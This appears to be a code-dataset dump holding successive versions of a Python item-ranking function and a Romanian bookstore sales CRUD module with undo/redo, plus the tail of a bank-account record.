\n \"\"\"\n\n @staticmethod\n def load_test_account() -> BankAccount:\n \"\"\"\n Creates and returns a test bank account.\n :return: a BankAccount\n \"\"\"\n budget_manager = BudgetCreator.load_test_budget_manager()\n return TroublemakerBankAccount('123123', 'HSBC', 1000, budget_manager)\n\n @classmethod\n def create_bank_account(cls, user_type: UserType) -> BankAccount:\n \"\"\"\n Prompts the user for bank account details, initializes a Bank\n Account based on the given user type and returns it.\n :param user_type: a UserType\n :return: a BankAccount\n \"\"\"\n bank_account_no = input('Enter bank account number: ')\n bank_name = input('Enter bank name: ')\n bank_balance = -1\n while bank_balance < 0:\n bank_balance = float(input('Enter bank balance: '))\n if bank_balance < 0:\n print('Bank balance must be greater than or equal to 0! Please'\n ' enter again!')\n budget_manager = BudgetCreator.create_budget_manager()\n return cls._user_type_mapper[user_type](\n bank_account_no,\n bank_name,\n bank_balance,\n budget_manager,\n )\n",
"step-ids": [
12,
17,
20,
25,
28
]
}
|
[
12,
17,
20,
25,
28
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def range(state):
    """Apply range-type ranking rules to every item in the state.

    NOTE(review): the name shadows the builtin ``range`` in this module;
    kept as-is because external callers reference it by this name.

    :param state: dict; reads state['tmp']['analysis']['range'] (ids of
        range rules), state['tmp']['analysis']['keys'] (key -> set of
        rule ids), state['rank'] (rule id -> rule dict) and
        state['tmp']['items'].
    :return: None; each item's 'rank' entry is mutated in place.
    """
    # Ids of the rules that belong to the "range" analysis.
    ran = state['tmp']['analysis']['range']
    # key -> list of range rules targeting that key (keys with no
    # overlapping rule ids are dropped).
    rang = {key: [state['rank'][i] for i in val & ran] for key, val in
            state['tmp']['analysis']['keys'].items() if val & ran}
    for item in state['tmp']['items']:
        item.setdefault('rank', 0)
        item_keys = set(item.keys())
        rang_keys = set(rang.keys())
        # Only score keys that both exist on the item and have rules.
        keys = item_keys & rang_keys
        for key in keys:
            val = item[key]
            ruls = rang[key]
            for rule in ruls:
                item['rank'] += _rank(val, rule)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def range(state):
    """Apply range-type ranking rules to every item in the state.

    NOTE(review): the name shadows the builtin ``range`` in this module;
    kept as-is because external callers reference it by this name.

    :param state: dict; reads state['tmp']['analysis']['range'] (ids of
        range rules), state['tmp']['analysis']['keys'] (key -> set of
        rule ids), state['rank'] (rule id -> rule dict) and
        state['tmp']['items'].
    :return: None; each item's 'rank' entry is mutated in place.
    """
    # Ids of the rules that belong to the "range" analysis.
    ran = state['tmp']['analysis']['range']
    # key -> list of range rules targeting that key (keys with no
    # overlapping rule ids are dropped).
    rang = {key: [state['rank'][i] for i in val & ran] for key, val in
            state['tmp']['analysis']['keys'].items() if val & ran}
    for item in state['tmp']['items']:
        item.setdefault('rank', 0)
        item_keys = set(item.keys())
        rang_keys = set(rang.keys())
        # Only score keys that both exist on the item and have rules.
        keys = item_keys & rang_keys
        for key in keys:
            val = item[key]
            ruls = rang[key]
            for rule in ruls:
                item['rank'] += _rank(val, rule)
def _rank(val, rule):
if 'rank' not in rule or 'val' not in rule:
return 0
if isinstance(val, dict):
return sum([_rank(val, rule) for val in val.values()])
if isinstance(val, collections.Iterable):
return sum([_rank(val, rule) for val in val])
if 'from' in rule['val'] and 'to' in rule['val']:
return rule['rank'] if rule['val']['from'] < val < rule['val']['to'
] else 0
if 'from' in rule['val']:
return rule['rank'] if rule['val']['from'] < val else 0
if 'to' in rule['val']:
return rule['rank'] if val < rule['val']['to'] else 0
return 0
<|reserved_special_token_1|>
import collections
def range(state):
    """Score every item against the range-type analysis rules.

    Determines which ranking rules are range rules, groups them by the
    item key they target, then accumulates each item's 'rank' with the
    score of every matching rule (computed by _rank).  Items are
    mutated in place; nothing is returned.
    """
    analysis = state['tmp']['analysis']
    range_rule_ids = analysis['range']
    # Map each key to the concrete range rules that target it.
    rules_by_key = {}
    for key, rule_ids in analysis['keys'].items():
        matching = rule_ids & range_rule_ids
        if matching:
            rules_by_key[key] = [state['rank'][rule_id] for rule_id in matching]
    for item in state['tmp']['items']:
        item.setdefault('rank', 0)
        # Only keys present on both the item and the rule map can score.
        for key in set(item.keys()) & set(rules_by_key.keys()):
            for rule in rules_by_key[key]:
                item['rank'] += _rank(item[key], rule)
def _rank(val, rule):
if 'rank' not in rule or 'val' not in rule:
return 0
if isinstance(val, dict):
return sum([_rank(val, rule) for val in val.values()])
if isinstance(val, collections.Iterable):
return sum([_rank(val, rule) for val in val])
if 'from' in rule['val'] and 'to' in rule['val']:
return rule['rank'] if rule['val']['from'] < val < rule['val']['to'
] else 0
if 'from' in rule['val']:
return rule['rank'] if rule['val']['from'] < val else 0
if 'to' in rule['val']:
return rule['rank'] if val < rule['val']['to'] else 0
return 0
<|reserved_special_token_1|>
import collections
def range(state):
    """Score every item against the range-type analysis rules.

    Determines which ranking rules are range rules, groups them by the
    item key they target, then accumulates each item's 'rank' with the
    score of every matching rule (computed by _rank).  Items are
    mutated in place; nothing is returned.
    """
    analysis = state["tmp"]["analysis"]
    range_rule_ids = analysis["range"]
    # Map each key to the concrete range rules that target it.
    rules_by_key = {}
    for key, rule_ids in analysis["keys"].items():
        matching = rule_ids & range_rule_ids
        if matching:
            rules_by_key[key] = [state["rank"][rule_id] for rule_id in matching]
    for item in state["tmp"]["items"]:
        item.setdefault("rank", 0)
        # Only keys present on both the item and the rule map can score.
        for key in set(item.keys()) & set(rules_by_key.keys()):
            for rule in rules_by_key[key]:
                item["rank"] += _rank(item[key], rule)
def _rank(val, rule):
if "rank" not in rule or "val" not in rule:
return 0
if isinstance(val, dict):
return sum([ _rank(val, rule) for val in val.values() ])
if isinstance(val, collections.Iterable):
return sum([ _rank(val, rule) for val in val ])
if "from" in rule["val"] and "to" in rule["val"]:
return rule["rank"] if rule["val"]["from"] < val < rule["val"]["to"] else 0
if "from" in rule["val"]:
return rule["rank"] if rule["val"]["from"] < val else 0
if "to" in rule["val"]:
return rule["rank"] if val < rule["val"]["to"] else 0
return 0
|
flexible
|
{
"blob_id": "51868f26599c5878f8eb976d928c30d0bf61547d",
"index": 9701,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\ndef _rank(val, rule):\n if 'rank' not in rule or 'val' not in rule:\n return 0\n if isinstance(val, dict):\n return sum([_rank(val, rule) for val in val.values()])\n if isinstance(val, collections.Iterable):\n return sum([_rank(val, rule) for val in val])\n if 'from' in rule['val'] and 'to' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val < rule['val']['to'\n ] else 0\n if 'from' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val else 0\n if 'to' in rule['val']:\n return rule['rank'] if val < rule['val']['to'] else 0\n return 0\n",
"step-4": "import collections\n\n\ndef range(state):\n ran = state['tmp']['analysis']['range']\n rang = {key: [state['rank'][i] for i in val & ran] for key, val in\n state['tmp']['analysis']['keys'].items() if val & ran}\n for item in state['tmp']['items']:\n item.setdefault('rank', 0)\n item_keys = set(item.keys())\n rang_keys = set(rang.keys())\n keys = item_keys & rang_keys\n for key in keys:\n val = item[key]\n ruls = rang[key]\n for rule in ruls:\n item['rank'] += _rank(val, rule)\n\n\ndef _rank(val, rule):\n if 'rank' not in rule or 'val' not in rule:\n return 0\n if isinstance(val, dict):\n return sum([_rank(val, rule) for val in val.values()])\n if isinstance(val, collections.Iterable):\n return sum([_rank(val, rule) for val in val])\n if 'from' in rule['val'] and 'to' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val < rule['val']['to'\n ] else 0\n if 'from' in rule['val']:\n return rule['rank'] if rule['val']['from'] < val else 0\n if 'to' in rule['val']:\n return rule['rank'] if val < rule['val']['to'] else 0\n return 0\n",
"step-5": "import collections\n\ndef range(state):\n\tran = state[\"tmp\"][\"analysis\"][\"range\"]\n\n\trang = {\n\t\tkey : [ state[\"rank\"][i] for i in val & ran ]\n\t\tfor key, val in state[\"tmp\"][\"analysis\"][\"keys\"].items()\n\t\tif val & ran\n\t}\n\n\tfor item in state[\"tmp\"][\"items\"]:\n\t\titem.setdefault(\"rank\", 0)\n\n\t\titem_keys = set(item.keys())\n\t\trang_keys = set(rang.keys())\n\t\tkeys = item_keys & rang_keys\n\n\t\tfor key in keys:\n\t\t\tval = item[key]\n\t\t\truls = rang[key]\n\n\t\t\tfor rule in ruls:\n\t\t\t\titem[\"rank\"] += _rank(val, rule)\n\ndef _rank(val, rule):\n\tif \"rank\" not in rule or \"val\" not in rule:\n\t\treturn 0\n\n\tif isinstance(val, dict):\n\t\treturn sum([ _rank(val, rule) for val in val.values() ])\n\n\tif isinstance(val, collections.Iterable):\n\t\treturn sum([ _rank(val, rule) for val in val ])\n\n\tif \"from\" in rule[\"val\"] and \"to\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if rule[\"val\"][\"from\"] < val < rule[\"val\"][\"to\"] else 0\n\n\tif \"from\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if rule[\"val\"][\"from\"] < val else 0\n\n\tif \"to\" in rule[\"val\"]:\n\t\treturn rule[\"rank\"] if val < rule[\"val\"][\"to\"] else 0\n\n\treturn 0\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def get_by_id(id, lista):
    """
    Return the sale with the given id from a list.
    :param id: the sale id to look for
    :param lista: list of sales
    :return: the sale with the given id, or None if it is not in the list
    """
    # Linear scan; ids are unique (enforced by create), so the first
    # match is the only one.
    for vanzare in lista:
        if get_id(vanzare) == id:
            return vanzare
    return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
           undo_list: list, redo_list: list):
    """
    Create a sale.
    :param lst_vanzari: current list of sales (not mutated)
    :param id_vanzare: unique id of the sale
    :param titlu: title of the book being sold
    :param gen: genre of the book
    :param pret: sale price
    :param tip_reducere: discount type; one of 'None', 'Gold', 'Silver'
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list with the created sale appended
    :raises TypeError: if tip_reducere is not a known discount type
    :raises ValueError: if a sale with id_vanzare already exists
    """
    new_list = ['None', 'Gold', 'Silver']
    if tip_reducere not in new_list:
        raise TypeError('Tip reducere necunoscut.')
    if get_by_id(id_vanzare, lst_vanzari) is not None:
        raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
    vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
    """
    Read a sale from the "database".
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to fetch
    :return: the sale with id id_carte, or None when no sale matches.
        NOTE(review): despite the original docstring, id_carte=None does
        NOT return the whole list here — assuming ids are ints, nothing
        matches None and the function returns None in that case.
    """
    cartea_cu_id = None
    # Keeps the last match; ids are unique, so at most one exists.
    for cartea in lst_vanzari:
        if get_id(cartea) == id_carte:
            cartea_cu_id = cartea
    if cartea_cu_id:
        return cartea_cu_id
    return None
<|reserved_special_token_0|>
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
    """
    Remove the sale with the given id.
    :param lst_vanzare: list of sales (not mutated)
    :param id_carte: id of the sale to remove
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales without the sale whose id is id_carte
    :raises ValueError: if no sale has that id
    """
    if read(lst_vanzare, id_carte) is None:
        raise ValueError(
            f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
    new_vanzari = []
    for carte in lst_vanzare:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzare)
    redo_list.clear()
    return new_vanzari
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def inverse_create(lst_vanzari, id_carte):
    """
    Undo helper for create: return a copy of the sale list without the
    sale whose id is id_carte (the original list is not mutated).
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to drop
    :return: a new list without that sale
    """
    new_vanzari = []
    for carte in lst_vanzari:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    return new_vanzari
def get_by_id(id, lista):
    """
    Return the sale with the given id from a list.
    :param id: the sale id to look for
    :param lista: list of sales
    :return: the sale with the given id, or None if it is not in the list
    """
    # Linear scan; ids are unique (enforced by create), so the first
    # match is the only one.
    for vanzare in lista:
        if get_id(vanzare) == id:
            return vanzare
    return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
           undo_list: list, redo_list: list):
    """
    Create a sale.
    :param lst_vanzari: current list of sales (not mutated)
    :param id_vanzare: unique id of the sale
    :param titlu: title of the book being sold
    :param gen: genre of the book
    :param pret: sale price
    :param tip_reducere: discount type; one of 'None', 'Gold', 'Silver'
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list with the created sale appended
    :raises TypeError: if tip_reducere is not a known discount type
    :raises ValueError: if a sale with id_vanzare already exists
    """
    new_list = ['None', 'Gold', 'Silver']
    if tip_reducere not in new_list:
        raise TypeError('Tip reducere necunoscut.')
    if get_by_id(id_vanzare, lst_vanzari) is not None:
        raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
    vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
    """
    Read a sale from the "database".
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to fetch
    :return: the sale with id id_carte, or None when no sale matches.
        NOTE(review): despite the original docstring, id_carte=None does
        NOT return the whole list here — assuming ids are ints, nothing
        matches None and the function returns None in that case.
    """
    cartea_cu_id = None
    # Keeps the last match; ids are unique, so at most one exists.
    for cartea in lst_vanzari:
        if get_id(cartea) == id_carte:
            cartea_cu_id = cartea
    if cartea_cu_id:
        return cartea_cu_id
    return None
<|reserved_special_token_0|>
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
    """
    Remove the sale with the given id.
    :param lst_vanzare: list of sales (not mutated)
    :param id_carte: id of the sale to remove
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales without the sale whose id is id_carte
    :raises ValueError: if no sale has that id
    """
    if read(lst_vanzare, id_carte) is None:
        raise ValueError(
            f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
    new_vanzari = []
    for carte in lst_vanzare:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzare)
    redo_list.clear()
    return new_vanzari
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def inverse_create(lst_vanzari, id_carte):
    """
    Undo helper for create: return a copy of the sale list without the
    sale whose id is id_carte (the original list is not mutated).
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to drop
    :return: a new list without that sale
    """
    new_vanzari = []
    for carte in lst_vanzari:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    return new_vanzari
def get_by_id(id, lista):
    """
    Return the sale with the given id from a list.
    :param id: the sale id to look for
    :param lista: list of sales
    :return: the sale with the given id, or None if it is not in the list
    """
    # Linear scan; ids are unique (enforced by create), so the first
    # match is the only one.
    for vanzare in lista:
        if get_id(vanzare) == id:
            return vanzare
    return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
           undo_list: list, redo_list: list):
    """
    Create a sale.
    :param lst_vanzari: current list of sales (not mutated)
    :param id_vanzare: unique id of the sale
    :param titlu: title of the book being sold
    :param gen: genre of the book
    :param pret: sale price
    :param tip_reducere: discount type; one of 'None', 'Gold', 'Silver'
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list with the created sale appended
    :raises TypeError: if tip_reducere is not a known discount type
    :raises ValueError: if a sale with id_vanzare already exists
    """
    new_list = ['None', 'Gold', 'Silver']
    if tip_reducere not in new_list:
        raise TypeError('Tip reducere necunoscut.')
    if get_by_id(id_vanzare, lst_vanzari) is not None:
        raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
    vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
    """
    Read a sale from the "database".
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to fetch
    :return: the sale with id id_carte, or None when no sale matches.
        NOTE(review): despite the original docstring, id_carte=None does
        NOT return the whole list here — assuming ids are ints, nothing
        matches None and the function returns None in that case.
    """
    cartea_cu_id = None
    # Keeps the last match; ids are unique, so at most one exists.
    for cartea in lst_vanzari:
        if get_id(cartea) == id_carte:
            cartea_cu_id = cartea
    if cartea_cu_id:
        return cartea_cu_id
    return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
    """
    Update a sale, matched by id.
    :param lst_vanzari: list of sales (not mutated)
    :param new_vanzare: the replacement sale; its id must already exist
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales with the matching entry replaced
    :raises ValueError: if no sale has new_vanzare's id
    """
    if read(lst_vanzari, get_id(new_vanzare)) is None:
        raise ValueError(
            f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'
            )
    new_vanzari = []
    for vanzare in lst_vanzari:
        if get_id(vanzare) != get_id(new_vanzare):
            new_vanzari.append(vanzare)
        else:
            # Same id: substitute the updated sale in its place.
            new_vanzari.append(new_vanzare)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return new_vanzari
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
    """
    Remove the sale with the given id.
    :param lst_vanzare: list of sales (not mutated)
    :param id_carte: id of the sale to remove
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales without the sale whose id is id_carte
    :raises ValueError: if no sale has that id
    """
    if read(lst_vanzare, id_carte) is None:
        raise ValueError(
            f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
    new_vanzari = []
    for carte in lst_vanzare:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzare)
    redo_list.clear()
    return new_vanzari
<|reserved_special_token_1|>
from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere
def inverse_create(lst_vanzari, id_carte):
    """
    Undo helper for create: return a copy of the sale list without the
    sale whose id is id_carte (the original list is not mutated).
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to drop
    :return: a new list without that sale
    """
    new_vanzari = []
    for carte in lst_vanzari:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    return new_vanzari
def get_by_id(id, lista):
    """
    Return the sale with the given id from a list.
    :param id: the sale id to look for
    :param lista: list of sales
    :return: the sale with the given id, or None if it is not in the list
    """
    # Linear scan; ids are unique (enforced by create), so the first
    # match is the only one.
    for vanzare in lista:
        if get_id(vanzare) == id:
            return vanzare
    return None
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
           undo_list: list, redo_list: list):
    """
    Create a sale.
    :param lst_vanzari: current list of sales (not mutated)
    :param id_vanzare: unique id of the sale
    :param titlu: title of the book being sold
    :param gen: genre of the book
    :param pret: sale price
    :param tip_reducere: discount type; one of 'None', 'Gold', 'Silver'
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list with the created sale appended
    :raises TypeError: if tip_reducere is not a known discount type
    :raises ValueError: if a sale with id_vanzare already exists
    """
    new_list = ['None', 'Gold', 'Silver']
    if tip_reducere not in new_list:
        raise TypeError('Tip reducere necunoscut.')
    if get_by_id(id_vanzare, lst_vanzari) is not None:
        raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
    vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return lst_vanzari + [vanzare_obiecte]
def read(lst_vanzari, id_carte: int=None):
    """
    Read a sale from the "database".
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to fetch
    :return: the sale with id id_carte, or None when no sale matches.
        NOTE(review): despite the original docstring, id_carte=None does
        NOT return the whole list here — assuming ids are ints, nothing
        matches None and the function returns None in that case.
    """
    cartea_cu_id = None
    # Keeps the last match; ids are unique, so at most one exists.
    for cartea in lst_vanzari:
        if get_id(cartea) == id_carte:
            cartea_cu_id = cartea
    if cartea_cu_id:
        return cartea_cu_id
    return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
    """
    Update a sale, matched by id.
    :param lst_vanzari: list of sales (not mutated)
    :param new_vanzare: the replacement sale; its id must already exist
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales with the matching entry replaced
    :raises ValueError: if no sale has new_vanzare's id
    """
    if read(lst_vanzari, get_id(new_vanzare)) is None:
        raise ValueError(
            f'Nu xista o vanzare cu id-ul {get_id(new_vanzare)} pe care sa o actualizam.'
            )
    new_vanzari = []
    for vanzare in lst_vanzari:
        if get_id(vanzare) != get_id(new_vanzare):
            new_vanzari.append(vanzare)
        else:
            # Same id: substitute the updated sale in its place.
            new_vanzari.append(new_vanzare)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return new_vanzari
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
    """
    Remove the sale with the given id.
    :param lst_vanzare: list of sales (not mutated)
    :param id_carte: id of the sale to remove
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales without the sale whose id is id_carte
    :raises ValueError: if no sale has that id
    """
    if read(lst_vanzare, id_carte) is None:
        raise ValueError(
            f'Nu xista o carte cu id-ul {id_carte} pe care sa o stergem.')
    new_vanzari = []
    for carte in lst_vanzare:
        if get_id(carte) != id_carte:
            new_vanzari.append(carte)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzare)
    redo_list.clear()
    return new_vanzari
<|reserved_special_token_1|>
from Domain.Librarie import vanzare_obiect, get_id, get_titlu, get_gen, get_pret, get_tip_reducere
def inverse_create(lst_vanzari, id_carte):
    """
    Undo helper for create: return a copy of the sale list without the
    sale whose id is id_carte (the original list is not mutated).
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to drop
    :return: a new list without that sale
    """
    return [vanzare for vanzare in lst_vanzari if get_id(vanzare) != id_carte]
def get_by_id(id, lista):
    """
    Return the sale with the given id from a list.
    :param id: the sale id to look for
    :param lista: list of sales
    :return: the sale with the given id, or None if it is not in the list
    """
    # Ids are unique (enforced by create), so the first match suffices.
    return next((vanzare for vanzare in lista if get_id(vanzare) == id), None)
def create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,
           undo_list: list, redo_list: list):
    """
    Create a sale and return the extended sale list.
    :param lst_vanzari: current list of sales (not mutated)
    :param id_vanzare: unique id of the sale
    :param titlu: title of the book being sold
    :param gen: genre of the book
    :param pret: sale price
    :param tip_reducere: discount type; one of 'None', 'Gold', 'Silver'
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list with the created sale appended
    :raises TypeError: if tip_reducere is not a known discount type
    :raises ValueError: if a sale with id_vanzare already exists
    """
    # Immutable constant; the old mutable list named `new_list` and the
    # surrounding commented-out dead code have been removed.
    tipuri_valide = ('None', 'Gold', 'Silver')
    if tip_reducere not in tipuri_valide:
        raise TypeError('Tip reducere necunoscut.')
    if get_by_id(id_vanzare, lst_vanzari) is not None:
        raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')
    vanzare_noua = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere)
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return lst_vanzari + [vanzare_noua]
def read(lst_vanzari, id_carte: int=None):
    """
    Read a sale from the "database".
    :param lst_vanzari: list of sales
    :param id_carte: id of the sale to fetch, or None to get all sales
    :return: the sale with id id_carte; the whole list when id_carte is
        None (the behavior the original docstring promised — previously
        this case fell through and returned None); None when not found
    """
    if id_carte is None:
        return lst_vanzari
    # Ids are unique, so returning the first match is equivalent to the
    # original last-match scan (and no longer drops a falsy match).
    for vanzare in lst_vanzari:
        if get_id(vanzare) == id_carte:
            return vanzare
    return None
def update(lst_vanzari, new_vanzare, undo_list: list, redo_list: list):
    """
    Replace an existing sale with *new_vanzare*, matched by id.
    :param lst_vanzari: list of sales (not mutated)
    :param new_vanzare: the replacement sale; its id must already exist
    :param undo_list: undo stack; receives the pre-change list
    :param redo_list: redo stack; cleared, a new action invalidates redo
    :return: a new list of sales with the matching entry replaced
    :raises ValueError: if no sale has new_vanzare's id
    """
    id_cautat = get_id(new_vanzare)
    if read(lst_vanzari, id_cautat) is None:
        raise ValueError(
            f'Nu xista o vanzare cu id-ul {id_cautat} pe care sa o actualizam.')
    rezultat = [new_vanzare if get_id(vanzare) == id_cautat else vanzare
                for vanzare in lst_vanzari]
    # Push the old list for undo and invalidate any pending redo.
    undo_list.append(lst_vanzari)
    redo_list.clear()
    return rezultat
def delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):
    """
    Remove the sale of the book with the given id (non-destructive: the
    original list is left untouched and pushed onto the undo stack).

    :param lst_vanzare: list of sales
    :param id_carte: id of the book whose sale should be removed
    :param undo_list: undo history; the pre-delete list is appended to it
    :param redo_list: redo history; cleared, since a fresh action invalidates it
    :return: a new list of sales without the entry whose id is id_carte
    :raises ValueError: if no sale with id id_carte exists
    """
    if read(lst_vanzare, id_carte) is None:
        # Fixed typo in the user-facing message: "xista" -> "exista".
        raise ValueError(
            f'Nu exista o carte cu id-ul {id_carte} pe care sa o stergem.')
    # Keep every sale except the one being deleted.
    new_vanzari = [carte for carte in lst_vanzare if get_id(carte) != id_carte]
    undo_list.append(lst_vanzare)
    redo_list.clear()
    return new_vanzari
|
flexible
|
{
"blob_id": "498d07421d848332ad528ef3d3910d70312b5f55",
"index": 2606,
"step-1": "<mask token>\n\n\ndef get_by_id(id, lista):\n \"\"\"\n ia vanzarea cu id-ul dat dintr-o lista\n :param id: id-ul vanzarii - string\n :param lista: lista de vanzari\n :return: vanzarea cu id-ul dat sau None daca nu exista in lista\n \"\"\"\n for vanzare in lista:\n if get_id(vanzare) == id:\n return vanzare\n return None\n\n\ndef create(lst_vanzari, id_vanzare: int, titlu, gen, pret, tip_reducere,\n undo_list: list, redo_list: list):\n \"\"\"\n Creeaza o vanzare\n :param lst_vanzari:lista de vanzari\n :param id_vanzare: id-ul vanzarii\n :param titlu: titlul cartii din vanzare\n :param gen: genul cartii din vanzare\n :param pret: pretul vanzarii\n :param tip_reducere: tipul de reducere\n :param undo_list: lista de sters\n :param redo_list: lista de adaugat\n :return: returneaza o vanzare cu un id unic si detaliile ei\n \"\"\"\n new_list = ['None', 'Gold', 'Silver']\n if tip_reducere not in new_list:\n raise TypeError('Tip reducere necunoscut.')\n if get_by_id(id_vanzare, lst_vanzari) is not None:\n raise ValueError(f'Exista deja o vanzare cu acest id {id_vanzare}.')\n vanzare_obiecte = vanzare_obiect(id_vanzare, titlu, gen, pret, tip_reducere\n )\n undo_list.append(lst_vanzari)\n redo_list.clear()\n return lst_vanzari + [vanzare_obiecte]\n\n\ndef read(lst_vanzari, id_carte: int=None):\n \"\"\"\n Citeste o vanzare din \"baza de date\".\n :param lst_vanzari: lista de vanzari\n :param id_vanzare: id-ul vanzarii.\n :return: cartea cu id-ul id_carte sau lista cu toate vanzarile, daca id_carte=None\n \"\"\"\n cartea_cu_id = None\n for cartea in lst_vanzari:\n if get_id(cartea) == id_carte:\n cartea_cu_id = cartea\n if cartea_cu_id:\n return cartea_cu_id\n return None\n\n\n<mask token>\n\n\ndef delete(lst_vanzare, id_carte: int, undo_list: list, redo_list: list):\n \"\"\"\n :param lst_vanzare: lista de vanzari\n :param id_carte: id-ul cartii din vanzare\n :param undo_list: lista cu vanzarea care trebuie stearsa\n :param redo_list: lista cu vanzarea care trebuie 
